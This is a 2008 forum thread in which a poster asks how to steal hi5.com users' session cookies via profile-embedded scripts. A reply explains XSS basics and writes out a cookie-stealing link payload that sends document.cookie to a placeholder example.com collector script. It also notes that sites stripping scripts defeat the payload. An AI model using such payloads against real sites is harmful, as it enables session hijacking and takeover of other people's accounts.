diego018 Posted September 15, 2008 Share Posted September 15, 2008 hi hackers. the social network site, hi5.com allows you to place codes like youtube scripts, etc. in your profile. i know that with a special function. <script>alert(document.cookie)</script> and if we create a special page in a webserver written in php to store the cookies, we can access as someone user via their cookies. here is some info i have found: http://www.pabrantes.net/blog/comments/start/2006-05-01/1 (dont know if it still works) i don´t know where to start, hope that you can give me some ideas. the only thing that i don´t know how to do, is how to retrieve the cookies, i know how to save them via a php file and a txt file. Quote Link to comment Share on other sites More sharing options...
DingleBerries Posted September 15, 2008 Share Posted September 15, 2008 In before thread locked Quote Link to comment Share on other sites More sharing options...
Swathe Posted September 15, 2008 Share Posted September 15, 2008 Quote Link to comment Share on other sites More sharing options...
Emilml Posted September 15, 2008 Share Posted September 15, 2008 In before thread locked Me2! Quote Link to comment Share on other sites More sharing options...
snakey Posted September 15, 2008 Share Posted September 15, 2008 pretty much failed at the locking call :P Quote Link to comment Share on other sites More sharing options...
psydT0ne Posted September 15, 2008 Share Posted September 15, 2008 OK...what exactly is this guy on about...and yes i'm clueless etc etc.... Quote Link to comment Share on other sites More sharing options...
digip Posted September 15, 2008 Share Posted September 15, 2008 <script>alert(document.cookie)</script> only shows you YOUR cookie. It doesn't log a users cookies from another site while visiting your site. It only shows the cookie for the page you are on and if the page you are on has set a cookie. For example, go to any site that uses cookies and type in your address bar the following: java script:alert(unescape(document.cookie)); (remove the space in "javascript") It will show you YOUR cookie. To steal a cookie, the site must be have a flaw to allow a xss attack of some sort, like: <a href="#" onclick="window.location='http://example.com/somescript.php?cookie='+escape(document.cookie); return false;">Click here!</a> And this only works if you can insert this on a foreign site other than your own, and chances are, won't work if the site knows what they are doing. They should remove any scripting in a post or comment field. The method you describe <script>alert(document.cookie)</script> is not going to work just by having them visit your page. Look at the link you posted about as they describe more in detail what is going on. Also, that post is from like 2006, so if they are still vulnerable to that sort of attack, I can't imagine they would still be afloat with such xss attacks made so easy on their system. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.